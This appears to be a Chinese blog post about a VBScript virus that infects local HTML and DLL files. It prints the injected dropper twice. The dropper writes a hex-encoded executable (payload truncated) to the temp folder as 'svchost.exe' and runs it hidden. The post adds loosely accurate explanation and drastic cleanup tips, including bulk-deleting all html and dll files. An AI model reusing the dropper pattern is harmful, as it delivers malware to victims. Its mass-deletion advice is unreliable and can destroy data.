html病毒:DropFileName = “svchost.exe”

<SCRIPT  Language=VBScript>

DropFileName = “svchost.exe”

WriteData =

“4D5A0000200000000400000F00FFF.............................................此处省略N个字符串”

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

一串VB脚本的JS 

JavaScript Code 复制内容到剪贴板
  1. <SCRIPT  Language=VBScript>  
  2.   
  3. DropFileName = “svchost.exe”  
  4.   
  5. WriteData =  
  6.   
  7. “4D5A0000200000000400000F00FFF.............................................此处省略N个字符串”  
  8.   
  9. Set FSO = CreateObject("Scripting.FileSystemObject")  
  10. DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName 
  11. If FSO.FileExists(DropPath)=False Then 
  12. Set FileObj = FSO.CreateTextFile(DropPath, True) 
  13. For i = 1 To Len(WriteData) Step 2 
  14. FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) 
  15. Next 
  16. FileObj.Close 
  17. End If 
  18. Set WSHshell = CreateObject("WScript.Shell")  
  19. WSHshell.Run DropPath, 0  
  20. //--></SCRIPT>  

 

 


这串script代码是一串vbs语言的病毒,中了改病毒后你会发现你的本地所有html文档打开后都会有这样一串字符,不仅仅是html文档,连dll文档也会被感染。

当然这种病毒不要太惊慌,因为他只是起到破坏文件的作用,不会有上传隐私,盗号等危害。


 这串代码大概意思就是找到svchost.exe这个进程然后注入数据运行,注入的就是后面的进制代码来运行。

这种病毒和其他病毒不同的是这种vbs病毒感染能力非常强,html文件一旦被感染,那么用户只要打开html文档病毒就运行上面改代码导致病毒直接感染到本地电脑全部html文件和dll文件,


的确 DLL文件也会呗感染 部分软件可以正常使用 不过杀毒软件会报毒 


而且你会发现你运行很多常用软件都会报毒,比如以前常用的迅雷丶酷狗等等一些常用的软件你再打开的时候居然提示都有病毒,当时我就觉得特别奇怪,迅雷是在官网下载的怎么可能会报毒呢?

所以这里的原因就是vbs病毒感染了迅雷等软件的安装文件中的dll,所以杀毒软件会不停的报毒,报毒名称也是vbs脚本病毒。

解决方法:

 

1不想折腾直接装系统。并且删除除c盘以外的其他绿色软件或是游戏等。本人强烈推荐格盘 因为 你其他盘被感染 装系统只是C盘文件 再浏览其他盘文件 有可能二次感染。

2用360杀毒,但是要切记,杀毒一定要杀2次,第二次杀毒要在安全模式下执行杀毒,因为安全模式中注入木马的进程一般都是不再运行的才能彻底。

3用查找删除工具全盘查找后缀名为html和dll的文件并批量删除。

博主的解决方法如下:

步骤是这样的 

1->重新安装系统其他盘里面的文件 重要的html文件或者是txt文件 保留 DLL就别要了

2->安装完系统以后 啥也不访问不动 然后 进入PE系统 下载一个软件 ultrareplace 下载地址:http://www.xiazaiba.com/html/4475.html

QQ截图20150910104429.jpg

3->替换完毕的文件复制到C盘 (在保证容量够的情况下 )然后把其他盘格式化掉OK!

如果有C大神 可以自己写特征码 清除工具。

  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

道北無彦祖

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值